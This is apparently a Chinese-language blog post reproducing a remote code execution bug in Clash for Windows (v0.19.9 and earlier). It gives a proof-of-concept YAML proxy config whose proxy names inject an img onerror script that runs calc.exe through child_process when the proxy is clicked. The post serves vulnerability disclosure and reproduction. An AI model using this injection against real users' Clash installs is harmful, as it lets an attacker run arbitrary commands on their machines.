2. 程式人生 > 其它 >Clash RCE 漏洞復現

Clash RCE 漏洞復現

阿新 發佈:2022-03-01

一、介紹

clash for windows是一款非常好用的程式設計輔助代理工具,相容性非常強,可以支援多平臺、snell,vmess等等,滿足不同使用者之間的使用需求,大大提高使用者的工作效率。軟體還可以自定義介面顏色,主題設定,方便使用者使用。

二、影響範圍

  • Windows v0.19.9版本及以下
  • MAC OS版本未知

三、復現流程

poc:

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

1、將poc放入檔案中修改為yaml格式,然後匯入

2、此時點選代理即可觸發計算器的命令

轉載請註明:Adminxe's Blog»Clash RCE 漏洞復現

相關推薦

Clash RCE 漏洞復現

一、介紹 clash for windows是一款非常好用的程式設計輔助代理工具,相容性非常強,可以支援多平臺、snell,vmess等等,滿足不同使用者之間的使用需求,大大提高使用者的工作效率。軟體還可以自定義介面顏色,主題

通達OA任意檔案上傳+檔案包含RCE漏洞復現(附自寫EXP)

一、環境搭建: 下載通達OA的安裝包,根據提示點選下一步安裝即可,安裝完成,訪問本機ip即可

通達OA 11.6 rce漏洞復現

在2020 hvv期間,接連爆出n多漏洞,這裡選擇通達OA 11.6 rce進行復現,其他版本請自行測試。

用友GRP-u8 注入-RCE漏洞復現

​ ​用友GRP-u8 注入-RCE漏洞復現 (HW第一時間復現了,當時覺得不合適,現在才發出來)

apache-log4j2-rce漏洞復現

  最近最熱門的無非是最近爆出的超大boss—Apache log4j2元件的rce漏洞。安全圈俗稱\'過年\',漏洞影響範圍之廣,危害之大堪比當年的永恆之藍。由於最近爆出,危害程度目前還正在不斷擴大中。超多的大佬已經復現

Ueditor Rce漏洞復現&分析

0x00 前言 復現學習 0x01 漏洞復現 環境搭建參考這篇blog,主要是在ueditor主目錄建立WEB-INF/lib,並將jar包移到該lib下,啟動tomcat伺服器。

Apache log4j2-RCE 漏洞復現(CVE-2021-44228)

Apache log4j2-RCE 漏洞復現 0x01 漏洞簡介 Apache Log4j2是一個基於Java的日誌記錄工具。由於Apache Log4j2某些功能存在遞迴解析功能,攻擊者可直接構造惡意請求,觸發遠端程式碼執行漏洞漏洞利用無需特殊配置,

fastjson1.2.24-RCE漏洞復現

最近在做滲透測試的時候遇到了fastjson-RCE但是反彈shell無果,但還是記錄一下。

漏洞復現-CVE-2017-12629-RCE-solr:XXE

0x00 實驗環境 攻擊機:Win 10、Win Server 2012 R2 靶機:Ubuntu18 (docker搭建的vulhub靶場)

漏洞復現-fastjson1.2.24-RCE

0x00 實驗環境 攻擊機:Win 10、Win Server2012 R2(公網環境,惡意java檔案所在伺服器)

Apache Ofbiz xmlrpc RCE漏洞(CVE-2020-9496)復現

Apache Ofbiz xmlrpc RCE漏洞(CVE-2020-9496)復現 簡介 Apache OFBiz全稱是The ApacheOpen For Business Project,是開一個放的電子商務平臺,也是一個非常著名的開源專案

漏洞復現】CVE-2021-22205 GitLab 未授權RCE

0x00 漏洞簡介: 漏洞出來第一時間,聽漏洞澮測的朋友傳來的情報,就及時給了POC,但一直沒復現,只是簡單看了文章,提到需要可以註冊使用者才能進行攻擊,然後就感覺挺雞肋,沒有再繼續看。

漏洞復現】Sunlogin RCE 向日葵遠端程式碼執行

一、介紹 向日葵遠端控制是一款面向企業和專業人員的遠端pc管理和控制的服務軟體。可以在任何有網路的情況下,輕鬆訪問並控制安裝了向日葵客戶端的遠端主機。同時還能實現遠端檔案傳輸、遠端視訊監控等功能,這不僅

ThinkPHP(5.0.23-rce)任意程式碼執行漏洞復現及原理

漏洞詳情: 攻擊者可向快取檔案內寫入PHP程式碼,導致遠端程式碼執行。根據漏洞利用能得出通過s引數傳遞具體的路由。參考http://blog.nsfocus.net/thinkphp-full-version-rce-vulnerability-analysis/?tdsourcetag=s

漏洞復現-CVE-2022-22963-Spring Cloud Function SpEL RCE

0x00 實驗環境 攻擊機:Ubuntu 靶場:vulhub搭建的靶場環境 0x01 影響版本 3.0.0.RELEASE <= Spring Cloud Function <= 3.1.6

Apache Dubbo Provider預設反序列漏洞復現(CVE-2020-1948)

Apache Dubbo Provider預設反序列漏洞(CVE-2020-1948) 0x01 搭建漏洞環境 漏洞介紹 2020年06月23日, 360CERT監測發現Apache Dubbo 官方釋出了Apache Dubbo 遠端程式碼執行的風險通告,該漏洞編號為CVE-2020-1948,

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現 漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。

F5 BIG-IP 遠端程式碼執行漏洞復現(CVE-2020-5902)

0x01 漏洞詳情 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

Joomla-3.4.6遠端程式碼執行漏洞復現

#01 Joomla簡介 Joomla!是一套自由、開放原始碼的內容管理系統,以PHP撰寫,用於釋出內容在全球資訊網與內部網,通常被用來搭建商業網站、個人部落格、資訊管理系統、Web 服務等,還可以進行二次開發以擴充使用範圍。

漏洞復現——weblogic任意檔案上傳(cve-2018-2894)

0X01漏洞簡介: Weblogic管理端未授權的兩個頁面存在任意上傳jsp檔案漏洞,進而獲取伺服器許可權。